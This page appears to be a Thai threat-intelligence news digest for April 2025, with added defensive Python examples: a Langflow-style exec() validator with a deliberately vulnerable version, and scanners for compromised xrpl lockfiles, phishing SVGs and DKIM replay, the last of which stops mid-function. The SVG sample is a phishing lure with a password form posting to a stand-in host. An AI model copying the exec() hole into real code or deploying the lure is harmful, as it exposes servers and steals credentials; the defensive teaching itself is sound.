Follow the news on the webboard or on the NCSA Thailand Facebook page
Kimsuky exploits the BlueKeep vulnerability to breach systems in South Korea and Japan, targeting the software, energy and finance industries
Scallywag network of WordPress plugins generates 1.4 billion fraudulent ad requests per day
Cyber Threat Intelligence 23 April 2025
Industrial Sector
- Siemens TeleControl Server Basic SQL
"Successful exploitation of these vulnerabilities could allow an attacker to read and write to the application's database, cause a denial-of-service condition, and execute code in an OS shell."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-112-01
- Schneider Electric Wiser Home Controller WHC-5918A
"Successful exploitation of this vulnerability could allow an attacker to disclose sensitive credentials."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-112-03
- ABB MV Drives
"Successful exploitation of these vulnerabilities could allow an attacker to gain full access to the drive or cause a denial-of-service condition."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-112-04
- Siemens TeleControl Server Basic
"Successful exploitation of this vulnerability could allow an attacker to cause the application to allocate exhaustive amounts of memory and subsequently create a denial-of-service condition."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-112-02
Vulnerabilities
- Active! Mail RCE Flaw Exploited In Attacks On Japanese Orgs
"An Active! Mail zero-day remote code execution vulnerability is actively exploited in attacks on large organizations in Japan. Active! mail is a web-based email client developed initially by TransWARE and later acquired by Qualitia, both Japanese companies. While it's not widely used worldwide like Gmail or Outlook, Active! is often used as a groupware component in Japanese-language environments of large corporations, universities, government agencies, and banks."
https://www.bleepingcomputer.com/news/security/active-mail-rce-flaw-exploited-in-attacks-on-japanese-orgs/
https://jvn.jp/en/jp/JVN22348866/index.html
- Bug Hunter Tricked SSL.com Into Issuing Cert For Alibaba Cloud Domain In 5 Steps
"Certificate issuer SSL.com’s domain validation system had an unfortunate bug that was exploited by miscreants to obtain, without authorization, digital certs for legit websites. With those certificates in hand, said fraudsters could set up more-convincing malicious copies of those sites for things like credential phishing, or decrypt intercepted HTTPS traffic between those sites and their visitors. And since learning of that flaw, SSL.com has revoked 11 wrongly issued certificates – one of them for Alibaba."
https://www.theregister.com/2025/04/22/ssl_com_validation_flaw/
https://www.securityweek.com/ssl-com-scrambles-to-patch-certificate-issuance-vulnerability/
https://hackread.com/ssl-com-vulnerability-fraud-ssl-certificates-domains/
- CVE-2025-3248: RCE Vulnerability In Langflow
"CVE-2025-3248, a critical remote code execution (RCE) vulnerability with a CVSS score of 9.8, has been discovered in Langflow, an open-source platform for visually composing AI-driven agents and workflows. The issue resides in the platform’s /api/v1/validate/code endpoint, which improperly invokes Python’s built-in exec() function on user-supplied code without authentication or sandboxing. This flaw allows attackers to exploit the API and execute arbitrary commands on the server, thus posing a significant risk to organizations using Langflow in their AI development workflows."
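An added illustration of the pattern the Langflow item above describes (exec() called on a request body, reachable without authentication), written for this digest rather than taken from Langflow's source: a vulnerable validator beside a hardened one that demands a credential and checks syntax with ast.parse(), which builds a tree without running the code. The function names, the api_key check, the "no imports, no dunder attributes" policy and the payload are assumptions; the payload only sets an environment variable so that the difference between the two validators is observable.

```python
import ast
import hmac
import os
from typing import Dict, List, Optional

MARKER = "DIGEST_DEMO_PWNED"  # environment variable the constructed payload sets
# Constructed stand-in for an attacker's request body: harmless, but it proves
# that the "validator" ran the submitted code inside the server process.
PAYLOAD = f"import os\nos.environ['{MARKER}'] = '1'\n"


def validate_code_unsafe(code: str) -> Dict[str, object]:
    """Vulnerable pattern: 'validate' by executing. Whoever can reach this
    function runs arbitrary Python with the privileges of the server."""
    try:
        exec(code, {})  # the bug: user-supplied source is executed
        return {"ok": True, "errors": []}
    except Exception as exc:  # SyntaxError, NameError, ...
        return {"ok": False, "errors": [f"{type(exc).__name__}: {exc}"]}


def validate_code_safe(code: str, api_key: Optional[str], expected_key: str) -> Dict[str, object]:
    """Hardened pattern: require a credential first, then check syntax with
    ast.parse(), which parses without executing, and apply a static policy to
    the resulting tree. The policy (no imports, no dunder attribute access) is
    an assumption made for this example, not Langflow's."""
    if not api_key or not hmac.compare_digest(api_key, expected_key):
        return {"ok": False, "errors": ["unauthenticated"]}
    try:
        tree = ast.parse(code, mode="exec")
    except SyntaxError as exc:
        return {"ok": False, "errors": [f"SyntaxError: {exc.msg} (line {exc.lineno})"]}
    findings: List[str] = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append(f"import at line {node.lineno}")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            findings.append(f"dunder attribute {node.attr!r} at line {node.lineno}")
    return {"ok": not findings, "errors": findings}


def demo() -> Dict[str, object]:
    """Run both validators on PAYLOAD and report whether the marker variable
    appeared, i.e. whether the submitted code actually executed."""
    os.environ.pop(MARKER, None)
    safe = validate_code_safe(PAYLOAD, api_key="letmein", expected_key="letmein")
    executed_by_safe = MARKER in os.environ
    unsafe = validate_code_unsafe(PAYLOAD)
    executed_by_unsafe = MARKER in os.environ
    os.environ.pop(MARKER, None)  # clean up after the demonstration
    return {
        "safe": safe,
        "unsafe": unsafe,
        "executed_by_safe": executed_by_safe,
        "executed_by_unsafe": executed_by_unsafe,
    }


if __name__ == "__main__":
    print(demo())
```

Run it directly and demo() reports executed_by_unsafe=True and executed_by_safe=False. The point for a code reviewer: any endpoint whose "validation" reaches exec() or eval() is remote code execution by construction; adding authentication narrows who can trigger it but does not make the construct safe, which is why the hardened form parses instead.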
https://www.zscaler.com/blogs/security-research/cve-2025-3248-rce-vulnerability-langflow
- ConfusedComposer: A Privilege Escalation Vulnerability Impacting GCP Composer
"Tenable Research discovered a privilege-escalation vulnerability in Google Cloud Platform (GCP) that is now fixed and which we dubbed ConfusedComposer. The vulnerability could have allowed an identity with permission (composer.environments.update) to edit a Cloud Composer environment to escalate privileges to the default Cloud Build service account. The default Cloud Build service account includes permissions to Cloud Build itself, as well as to Cloud Storage, Artifact Registry, and more."
https://www.tenable.com/blog/confusedcomposer-a-privilege-escalation-vulnerability-impacting-gcp-composer
https://thehackernews.com/2025/04/gcp-cloud-composer-bug-let-attackers.html
Malware
- Case Of Attacks Targeting MS-SQL Servers To Install Ammyy Admin
"AhnLab SEcurity intelligence Center (ASEC) recently identified cases of attacks installing Ammyy Admin on poorly managed MS-SQL servers. Ammyy Admin is a remote control tool used to control systems remotely along with AnyDesk, ToDesk, TeamViewer, etc."
https://asec.ahnlab.com/en/87606/
- Billbug: Intrusion Campaign Against Southeast Asia Continues
"The Billbug espionage group (aka Lotus Blossom, Lotus Panda, Bronze Elgin) compromised multiple organizations in a single Southeast Asian country during an intrusion campaign that ran between August 2024 and February 2025. Targets included a government ministry, an air traffic control organization, a telecoms operator, and a construction company. In addition to this, the group staged an intrusion against a news agency located in another country in Southeast Asia and an air freight organization located in another neighboring country."
https://www.security.com/threat-intelligence/billbug-china-espionage
https://thehackernews.com/2025/04/lotus-panda-hacks-se-asian-governments.html
https://therecord.media/billbug-china-linked-apt-southeast-asian-country-multiple-orgs-hacked
https://www.infosecurity-magazine.com/news/billbug-espionage-group-new-tools/
- SK Telecom Warns Customer USIM Data Exposed In Malware Attack
"South Korea's largest mobile operator, SK Telecom, is warning that a malware infection allowed threat actors to access sensitive USIM-related information for customers. SK Telecom is the largest mobile network operator in South Korea, holding approximately 48.4% of the mobile phone service market in the country, corresponding to 34 million subscribers. The company says they detected malware on their systems at 11 PM local time on Saturday, April 19, 2025, in a weekend cyberattack when most organizations are understaffed."
https://www.bleepingcomputer.com/news/security/sk-telecom-warns-customer-usim-data-exposed-in-malware-attack/
https://securityaffairs.com/176802/data-breach/sk-telecom-data-breach.html
- Ripple's Recommended XRP Library Xrpl.js Hacked To Steal Wallets
"The recommended Ripple cryptocurrency NPM JavaScript library named "xrpl.js" was compromised to steal XRP wallet seeds and private keys and transfer them to an attacker-controlled server, allowing threat actors to steal all the funds stored in the wallets. Malicious code was added to versions 2.14.2, 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of the xrpl NPM package and published to the NPM registry yesterday between 4:46 PM and 5:49 PM ET. These compromised versions have since been removed, and a clean 4.2.5 release is now available that all users should upgrade to immediately."
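A check a practitioner would want after the xrpl.js item above, added here as example code (not Ripple's or npm's tooling): scan a package-lock.json for the versions the item lists, including nested copies that another dependency may pull in, which a glance at the top-level dependency list can miss. The lockfile layouts follow npm's lockfileVersion 1 (nested "dependencies" trees) and 2/3 (flat "packages" map keyed by install path); the sample lockfiles and the "wallet-helper" package name are constructed for this example.

```python
import json
from typing import Dict, List

# Versions named in the item above as carrying the wallet-stealing code.
COMPROMISED_XRPL = {"2.14.2", "4.2.1", "4.2.2", "4.2.3", "4.2.4"}


def find_compromised_xrpl(lockfile_text: str) -> List[Dict[str, str]]:
    """Return every xrpl install in a package-lock.json whose version is in
    COMPROMISED_XRPL, including nested copies pulled in by other packages."""
    lock = json.loads(lockfile_text)
    hits: List[Dict[str, str]] = []

    if "packages" in lock:  # lockfileVersion 2 or 3: flat map keyed by install path
        for path, meta in lock["packages"].items():
            if not path:  # "" is the project itself
                continue
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            if name == "xrpl" and meta.get("version") in COMPROMISED_XRPL:
                hits.append({"path": path, "version": meta["version"],
                             "resolved": meta.get("resolved", "")})
    else:  # lockfileVersion 1: nested "dependencies" trees
        def walk(deps: Dict[str, dict], prefix: str) -> None:
            for name, meta in deps.items():
                path = f"{prefix}node_modules/{name}"
                if name == "xrpl" and meta.get("version") in COMPROMISED_XRPL:
                    hits.append({"path": path, "version": meta["version"],
                                 "resolved": meta.get("resolved", "")})
                walk(meta.get("dependencies", {}), path + "/")
        walk(lock.get("dependencies", {}), "")

    return sorted(hits, key=lambda h: h["path"])


# Constructed lockfile (not a real project): a direct xrpl 4.2.4 plus a second
# copy, 2.14.2, nested under a hypothetical "wallet-helper" library.
SAMPLE_LOCK_V3 = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"xrpl": "^4.2.0"}},
        "node_modules/xrpl": {"version": "4.2.4",
                              "resolved": "https://registry.npmjs.org/xrpl/-/xrpl-4.2.4.tgz"},
        "node_modules/ripple-binary-codec": {"version": "2.2.0"},
        "node_modules/wallet-helper": {"version": "1.0.0"},
        "node_modules/wallet-helper/node_modules/xrpl": {"version": "2.14.2"},
    },
})

# Same idea in the older nested layout: the top-level copy is the clean 4.2.5,
# but a nested 4.2.1 is still present.
SAMPLE_LOCK_V1 = json.dumps({
    "name": "demo-app", "lockfileVersion": 1,
    "dependencies": {
        "xrpl": {"version": "4.2.5"},
        "wallet-helper": {"version": "1.0.0",
                          "dependencies": {"xrpl": {"version": "4.2.1"}}},
    },
})

if __name__ == "__main__":
    for hit in find_compromised_xrpl(SAMPLE_LOCK_V3) + find_compromised_xrpl(SAMPLE_LOCK_V1):
        print(f"{hit['path']}: xrpl {hit['version']} is a compromised release")
```

Point find_compromised_xrpl at the text of a real package-lock.json. A non-empty result means more than upgrading to the clean 4.2.5 release: any seed or private key loaded while a listed version was installed should be treated as exposed and the funds moved.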
https://www.bleepingcomputer.com/news/security/ripples-recommended-xrp-library-xrpljs-hacked-to-steal-wallets/
- Cookie-Bite: How Your Digital Crumbs Let Threat Actors Bypass MFA And Maintain Access To Cloud Environments
"Silent and undetectable initial access is the cornerstone of a successful cyberattack. MFA is designed to thwart such unauthorized access, but attackers are constantly evolving their techniques to bypass these defenses. Varonis Threat Labs researchers uncovered techniques that attackers are using to bypass MFA using stolen browser cookies. By leveraging custom-made malicious browser extensions and automation scripts, attackers can extract and reuse authentication cookies to impersonate users without needing credentials, while keeping persistence."
https://www.varonis.com/blog/cookie-bite
https://www.bleepingcomputer.com/news/security/cookie-bite-attack-poc-uses-chrome-extension-to-steal-session-tokens/
https://www.darkreading.com/remote-workforce/cookie-bite-entra-id-attack-exposes-microsoft-365
- Phishing For Codes: Russian Threat Actors Target Microsoft 365 OAuth Workflows
"Since early March 2025, Volexity has observed multiple suspected Russian threat actors conducting highly targeted social engineering operations aimed at gaining access to the Microsoft 365 (M365) accounts of targeted individuals. This activity comes on the heels of attacks Volexity reported on back in February 2025, where Russian threat actors were discovered targeting users and organizations through Device Code Authentication phishing."
https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/
https://therecord.media/russia-linked-phishing-microsoft365-ukraine-ngos
- Infostealer Malware FormBook Spread Via Phishing Campaign – Part I
"Fortinet’s FortiGuard Labs observed a phishing campaign in the wild that delivered a malicious Word document as an attachment. This document contained crafted data designed to exploit the vulnerability CVE-2017-11882. After conducting an in-depth analysis, I discovered that the campaign was spreading a new variant of Formbook. Formbook is information-stealing malware targeting Windows users. It steals sensitive data from compromised systems, including stored credentials from popular software, the victim’s keystrokes, screenshots, and system clipboard data."
https://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign-part-i
- Android Spyware Trojan Targets Russian Military Personnel Who Use Alpine Quest Mapping Software
"Doctor Web’s experts have discovered Android.Spy.1292.origin, spyware whose main target is Russian military personnel. The attackers hide this trojan inside modified Alpine Quest mapping software and distribute it in various ways, including through one of the Russian Android app catalogs. Among other things, the malware sends the attackers phonebook contact information and the infected device’s geolocation. Moreover, this spyware collects data about the files stored on the devices and, when commanded by threat actors, can download additional modules possessing the functionality needed to steal the files."
https://news.drweb.com/show/?i=15006&lng=en
https://hackread.com/fake-alpine-quest-mapping-app-spying-russian-military/
- Phishers Exploit Google Sites And DKIM Replay To Send Signed Emails, Steal Credentials
"In what has been described as an "extremely sophisticated phishing attack," threat actors have leveraged an uncommon approach that allowed bogus emails to be sent via Google's infrastructure and redirect message recipients to fraudulent sites that harvest their credentials. "The first thing to note is that this is a valid, signed email – it really was sent from no-reply@google.com," Nick Johnson, the lead developer of the Ethereum Name Service (ENS), said in a series of posts on X. "It passes the DKIM signature check, and Gmail displays it without any warnings – it even puts it in the same conversation as other, legitimate security alerts.""
https://thehackernews.com/2025/04/phishers-exploit-google-sites-and-dkim.html
https://www.malwarebytes.com/blog/news/2025/04/all-gmail-users-at-risk-by-clever-replay-attack
https://www.securityweek.com/legacy-google-service-abused-in-phishing-attacks/
- Russian Organizations Targeted By Backdoor Masquerading As Secure Networking Software Updates
"As we were looking into a cyberincident in April 2025, we uncovered a rather sophisticated backdoor. It targeted various large organizations in Russia, spanning the government, finance, and industrial sectors. While our investigation into the attack associated with the backdoor is still ongoing, we believe it is crucial to share our preliminary findings with the community. This will enable organizations that may be at risk of infection from the backdoor to take swift action to protect themselves from this threat."
https://securelist.com/new-backdoor-mimics-security-software-update/116246/
- Obfuscation Overdrive: Next-Gen Cryptojacking With Layers
"Out of all the services honeypotted by Darktrace, Docker is the most commonly attacked, with new strains of malware emerging daily. This blog will analyze a novel malware campaign with a unique obfuscation technique and a new cryptojacking technique."
https://www.darktrace.com/blog/obfuscation-overdrive-next-gen-cryptojacking-with-layers
https://thehackernews.com/2025/04/docker-malware-exploits-teneo-web3-node.html
https://www.infosecurity-magazine.com/news/cryptojacking-malware-docker-novel/
Breaches/Hacks/Leaks
- Marks & Spencer Confirms a Cyberattack As Customers Face Delayed Orders
"Marks & Spencer (M&S) has disclosed that it is responding to a cyberattack over the past few days that has impacted operations, including its Click and Collect service. The company is a British multinational retailer known for selling various products, including clothing, food, and home goods. Marks & Spencer operates over 1,400 stores and employs 64,000 employees globally. The company confirmed the cybersecurity incident in a press release on the London Stock Exchange, stating that they are working with cybersecurity experts to manage and resolve the situation."
https://www.bleepingcomputer.com/news/security/marks-and-spencer-confirms-a-cyberattack-as-customers-face-delayed-orders/
https://therecord.media/british-retailer-MS-confirms-cyber-incident-store-delays
https://www.theregister.com/2025/04/22/marks_spencer_cyber_incident/
- Two Healthcare Orgs Hit By Ransomware Confirm Data Breaches Impacting Over 100,000
"Two healthcare organizations have each confirmed suffering data breaches impacting more than 100,000 people after being targeted in ransomware attacks. One of them is Milwaukee, WI-based Bell Ambulance, which provides ambulance services in the area. The company revealed last week in a data security notice that it detected a network intrusion on February 13, 2025. An investigation showed that hackers gained access to files containing information such as name, date of birth, SSN, and driver’s license number, as well as financial, medical and health insurance information."
https://www.securityweek.com/two-healthcare-orgs-hit-by-ransomware-confirm-data-breaches-impacting-over-100000/
https://www.darkreading.com/cyberattacks-data-breaches/healthcare-orgs-hit-ransomeware-attacks
- Thousands Of Baltimore Students, Teachers Affected By Data Breach Following February Ransomware Attack
"Thousands of students, teachers and administrators had information stolen from the Baltimore City Public Schools system during a ransomware attack in February. Officials at Baltimore City Public Schools published a breach notice on Tuesday warning that a cyber incident on February 13 exposed certain IT systems within the network. The statement said an investigation revealed that “certain documents may have been compromised by criminal actors, which contained information belonging to some current and former employees, volunteers, and contractors, as well as files related to less than 1.5% of our student population.”"
https://therecord.media/baltimore-public-schools-data-breach-ransomware
General News
- The Legal Blind Spot Of Shadow IT
"Shadow IT isn’t just a security risk, it’s a legal one. When teams use unsanctioned tools, they can trigger compliance violations, expose sensitive data, or break contracts. Let’s look at where the legal landmines are and what CISOs can do to stay ahead of them."
https://www.helpnetsecurity.com/2025/04/22/shadow-it-legal-blind-spot/
- The C-Suite Gap That’s Putting Your Company At Risk
"New research from EY US shows that cyber attacks are creating serious financial risks. C-suite leaders don’t always agree on how exposed their companies are or where the biggest threats come from. In EY US’s latest C-suite cybersecurity study, 84% of executives said their company had faced a cyber incident in the past three years. Another EY US review of Russell 3000 companies found that after a cyber attack, a company’s stock price drops by an average of 1.5% over the next 90 days. This shows how much these attacks can hurt a company’s value."
https://www.helpnetsecurity.com/2025/04/22/c-suite-gap-risk/
- What School IT Admins Are Up Against, And How To Help Them Win
"School IT admins are doing tough, important work under difficult conditions. From keeping Wi-Fi stable during exams to locking down systems from phishing emails, their job is part technician, part strategist, part firefighter. But they’re stretched thin. The tools are outdated, the support is missing, and the pressure never stops. Here’s a look at what they’re dealing with and how we can help."
https://www.helpnetsecurity.com/2025/04/22/what-school-it-admins-are-up-against/
- Compliance Weighs Heavily On Security And GRC Teams
"Only 29% of all organizations say their compliance programs consistently meet internal and external standards, according to Swimlane. Their report reveals that fragmented workflows, manual evidence gathering and poor collaboration between security and governance, risk and compliance (GRC) teams are leaving organizations vulnerable to audit failures, regulatory penalties and security gaps."
https://www.helpnetsecurity.com/2025/04/22/security-grc-teams-compliance/
- CVE Controversy Creates Opportunity To Improve
"An intense debate over how best to administer the tracking of common vulnerabilities and exposures (CVEs) is now underway following a last-minute decision by the Trump administration to continue funding this effort for the next 11 months. Today, CVEs are each given a unique name under a federally funded program administered by the MITRE Corporation. Any new vulnerability that is discovered can be reported to a CVE Numbering Authority (CNA) that helps administer the program. That data is then widely shared with cybersecurity vendors that use that information to alert customers and, if available, help remediate the root cause of the issue."
https://blog.barracuda.com/2025/04/21/cve-controversy-opportunity-improve
- Russia Attempting Cyber Sabotage Attacks Against Dutch Critical Infrastructure
"Russian state-sponsored hackers have attempted to sabotage Dutch critical infrastructure in attacks this year and last, according to the Dutch Military Intelligence and Security Service’s annual public report, published Tuesday. Although the impact was said to be “minimal”, last year’s incident appeared to be “the first time that a group like this has carried out a cyber sabotage attack against such a control system in the Netherlands,” warned the service, known as the MIVD. The incidents were not detailed further in the MIVD’s public annual report, but mark an uptick in activity since 2023 when Hans de Vries — then the director of the country’s National Cyber Security Centre, and now the head at the EU’s cybersecurity agency — told Recorded Future News the Netherlands was not observing attacks directly targeting its own infrastructure."
https://therecord.media/dutch-mivd-report-russian-cyber-sabotage
https://www.bankinfosecurity.com/russian-chinese-hackers-targeted-dutch-government-a-28064
- The State Of Ransomware In The First Quarter Of 2025: Record-Breaking 126% Spike In Public Extortion Cases
"Ransomware remains one of the most persistent and damaging cyber threats facing organizations globally. The first quarter of 2025 marked an unprecedented surge in activity, with 74 distinct ransomware groups publicly claiming victims on data leak sites (DLS). These groups collectively reported 2,289 victims—more than double the number disclosed in the same period last year, which saw 1,011 published cases – a year-over-year increase of 126%."
https://blog.checkpoint.com/research/the-state-of-ransomware-in-the-first-quarter-of-2025-a-126-increase-in-ransomware-yoy/
- IBM X-Force 2025 Threat Intelligence Index
"This year, we’ve seen shape-shifting cyber adversaries gain more access, move across networks more easily, and create new outposts in relative obscurity. Equipped with advanced tools, threat actors are increasingly using compromised log-in credentials rather than brute-force hacking. The damage they inflict continues to grow as the global average cost of a data breach hit a record $4.88 million in 2024. What’s even more concerning is that data breaches are often only the start of larger and more coordinated campaigns. Threat actors openly trade exploits on the dark web to target critical infrastructure such as power grids, health networks, and industrial systems."
https://www.ibm.com/thought-leadership/institute-business-value/en-us/report/2025-threat-intelligence-index
https://cyberscoop.com/ibm-x-force-threat-intelligence-index-2025/
- DeepSeek Breach Opens Floodgates To Dark Web
"The recent DeepSeek security breach has once again highlighted the significant vulnerabilities in artificial intelligence (AI) systems and raises alarming questions about where the exposed data may have ended up. Shortly after DeepSeek's release, security researchers uncovered extensive vulnerabilities in the system's infrastructure. Publicly exposed sensitive user data and proprietary information like this often makes its way to the Dark Web — a thriving underground market where stolen data is routinely traded, sold, and exploited."
https://www.darkreading.com/cyberattacks-data-breaches/deepseek-breach-opens-floodgates-dark-web
- 54% Of Tech Hiring Managers Expect Layoffs In 2025
"54% of tech hiring managers say their companies are likely to conduct layoffs within the next year, and 45% say employees whose roles can be replaced by AI are most likely to be let go, according to a new study by General Assembly. “We’re on the precipice of an unprecedented skills crisis,” said Daniele Grassi, CEO of General Assembly. “Businesses are ramping up AI investments and reducing headcount in the name of productivity, but they are creating a widening skills gap that will ultimately slow transformation. It’s time to get AI skills to every employee.”"
https://www.helpnetsecurity.com/2025/04/22/tech-layoffs-2025/
- Cybersecurity In 2025 - Real-World Threats And Lessons Learned
"As cyber threats evolve, understanding their real-world impact is crucial. This article explores four significant cybersecurity threats shaping 2025—each illustrated by an actual incident that caused material losses—and the key lessons organisations can take from them."
https://www.darknet.org.uk/2025/04/cybersecurity-in-2025-real-world-threats-and-lessons-learned/
Reference: Electronic Transactions Development Agency (ETDA)
Siemens TeleControl Server Basic SQL
CISA releases five Industrial Control Systems advisories
The Cybersecurity and Infrastructure Security Agency (CISA) released five Industrial Control Systems (ICS) advisories on 22 April 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. They are as follows:
- ICSA-25-112-01 Siemens TeleControl Server Basic SQL
- ICSA-25-112-02 Siemens TeleControl Server Basic
- ICSA-25-112-03 Schneider Electric Wiser Home Controller WHC-5918A
- ICSA-25-112-04 ABB MV Drives
- ICSA-25-035-04 Schneider Electric Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC (Update A)
CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations. Further details: https://www.cisa.gov/news-events/alerts/2025/04/22/cisa-releases-five-industrial-control-systems-advisories
Hackers have been attacking SonicWall SMA appliances since January 2025
Mustang Panda hacker group adds four new attack tools
Cyber Threat Intelligence 22 April 2025
New Tooling
- Hawk Eye: Open-Source Scanner Uncovers Secrets And PII Across Platforms
"Hawk Eye is an open-source tool that helps find sensitive data before it leaks. It runs from the command line and checks many types of storage for PII and secrets: passwords, API keys, and personal information. “Unlike most open-source tools that only scan cloud buckets for PII, this solution is designed for deep integration across your entire ecosystem. It supports 350+ file types (including videos, images, and documents), uses advanced OCR, and ensures complete data privacy by running entirely on-prem. No data ever leaves your environment,” Rohit Kumar, the developer of Hawk Eye, told Help Net Security."
https://www.helpnetsecurity.com/2025/04/21/hawk-eye-open-source-scanner/
https://github.com/rohitcoder/hawk-eye
Malware
- Phishing Attacks Leveraging HTML Code Inside SVG Files
"With each passing year, phishing attacks feature more and more elaborate techniques designed to trick users and evade security measures. Attackers employ deceptive URL redirection tactics, such as appending malicious website addresses to seemingly safe links, embed links in PDFs, and send HTML attachments that either host the entire phishing site or use JavaScript to launch it. Lately, we have noticed a new trend where attackers are distributing attachments in SVG format, the kind normally used for storing images."
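An added example for the SVG item above (not Kaspersky's code): a scanner that parses an SVG attachment with Python's standard library and flags the constructs a phishing lure inside an "image" needs, namely <script>, <foreignObject> wrapping XHTML, event-handler attributes and javascript:/data: URLs. The tag list and the two sample files are constructed for this digest. In production, parse untrusted XML with defusedxml rather than xml.etree directly, because the stock parser's resistance to entity-expansion attacks depends on the underlying Expat version.

```python
import xml.etree.ElementTree as ET
from typing import List

XHTML_NS = "http://www.w3.org/1999/xhtml"
# Elements that have no business in an image attachment (assumed policy).
SUSPECT_TAGS = {"script", "foreignObject", "iframe", "embed", "object", "form", "input"}
SUSPECT_URL_PREFIXES = ("javascript:", "vbscript:", "data:text/html")
URL_ATTRS = {"href", "src", "action", "data"}


def _local(qname: str) -> str:
    """'{namespace}tag' -> 'tag' (ElementTree's Clark notation)."""
    return qname.rsplit("}", 1)[-1]


def _namespace(qname: str) -> str:
    return qname[1:].split("}", 1)[0] if qname.startswith("{") else ""


def scan_svg(svg_text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious.
    Parse failures are reported rather than ignored: browsers are more lenient
    than this parser, so a file it rejects may still render for the victim."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"unparsable XML ({exc}); treat as suspicious"]

    findings: List[str] = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in SUSPECT_TAGS:
            findings.append(f"<{tag}> element")
        if _namespace(el.tag) == XHTML_NS:
            findings.append("XHTML content embedded in SVG")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):  # onload, onclick, onerror, ...
                findings.append(f"event handler {name} on <{tag}>")
            if name in URL_ATTRS and value.strip().lower().startswith(SUSPECT_URL_PREFIXES):
                findings.append(f"{name}={value.strip()[:40]!r} on <{tag}>")
    return list(dict.fromkeys(findings))  # de-duplicate, keep first-seen order


# Constructed samples. The "malicious" one mimics the technique: an HTML login
# form inside <foreignObject>, a redirect script, and a javascript: link.
BENIGN_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
    '<circle cx="5" cy="5" r="4" fill="#09f"/></svg>'
)

MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="400" height="300">
  <foreignObject width="100%" height="100%">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <form action="https://login.example.invalid/collect" method="post">
        <input name="user"/><input name="pass" type="password"/>
      </form>
    </body>
  </foreignObject>
  <script>window.location = "https://login.example.invalid/"</script>
  <a xlink:href="javascript:alert(1)"><text x="10" y="20">Open document</text></a>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, scan_svg(sample) or "clean")
```

Run at a mail gateway, a non-empty result is reason enough to quarantine: an SVG that legitimately stores an image needs none of these constructs, so the rule can be strict without a meaningful false-positive rate on real image attachments.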
https://securelist.com/svg-phishing/116256/
- Proton66 Part 1: Mass Scanning And Exploit Campaigns
"In this two-part series, SpiderLabs explores the malicious traffic associated with Proton66, revealing the extent and nature of these attacks. The first part of the series focuses on mass scanning and exploit activities, highlighting a specific IP address connected to SuperBlack ransomware operators, found to distribute some of the latest critical priority exploits. The second part delves into a range of malware campaigns linked to Proton66, including compromised WordPress websites redirecting Android devices to fake Google Play stores, an XWorm campaign targeting Korean-speaking chat room users, and the WeaXor Ransomware."
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/proton66-part-1-mass-scanning-and-exploit-campaigns/
https://thehackernews.com/2025/04/hackers-abuse-russian-bulletproof-host.html
- FOG Ransomware Spread By Cybercriminals Claiming Ties To DOGE
"During our monitoring of the ransomware threat landscape, we discovered samples with infection chain characteristics and payloads that can be attributed to FOG ransomware. A total of nine samples were uploaded to VirusTotal between March 27 and April 2, which we recently discovered were multiple ransomware binaries with .flocked extension and readme.txt notes. We observed that these samples initially dropped a note containing key names related to the Department of Government Efficiency (DOGE), an initiative of the current US administration that has been making headlines, recently about a member who allegedly assisted a cybercrime group involved in data theft and cyberstalking an agent of the Federal Bureau of Investigation (FBI). The note also contains instructions to spread the ransomware payload to other computers by pasting the provided code in the note. "
https://www.trendmicro.com/en_us/research/25/d/fog-ransomware-concealed-within-binary-loaders-linking-themselve.html
https://www.darkreading.com/cyberattacks-data-breaches/fog-hackers-doge-ransom-notes
- Phishers Abuse Google OAuth To Spoof Google In DKIM Replay Attack
"In a rather clever attack, hackers leveraged a weakness that allowed them to send a fake email that seemed delivered from Google’s systems, passing all verifications but pointing to a fraudulent page that collected logins. The attacker leveraged Google’s infrastructure to trick recipients into accessing a legitimate-looking “support portal” that asks for Google account credentials. The fraudulent message appeared to come from “no-reply@google.com” and passed the DomainKeys Identified Mail (DKIM) authentication method but the real sender was different."
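Both DKIM replay items on this page (the Nick Johnson report in the 23 April digest and the write-up above) turn on the same fact: the message really was signed by Google, so signature verification cannot catch it. What can is context the signature does not bind. Below is added example code (not from the reports, nor from Google or Gmail): given a message an upstream verifier has already passed, it parses the DKIM-Signature tag list and flags replay indicators, namely the signed To: header not containing the actual envelope recipient, headers left out of h=, an l= body-length limit and a missing x= expiry. The sample message and its signature values are constructed placeholders; nothing here verifies cryptography.

```python
import email
from email import policy
from typing import Dict, List


def parse_dkim_tags(header_value: str) -> Dict[str, str]:
    """Split a DKIM-Signature value into its tag=value pairs (RFC 6376 tag list)."""
    tags: Dict[str, str] = {}
    for part in header_value.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip()] = "".join(value.split())  # drop folding whitespace
    return tags


def replay_indicators(raw_message: bytes, envelope_rcpt: str) -> List[str]:
    """Heuristics that a message whose DKIM signature verified is a replay:
    the signature binds the signed headers and body, not who received them.
    envelope_rcpt is the SMTP RCPT TO address the receiving MTA saw."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    sig = msg.get("DKIM-Signature")
    if sig is None:
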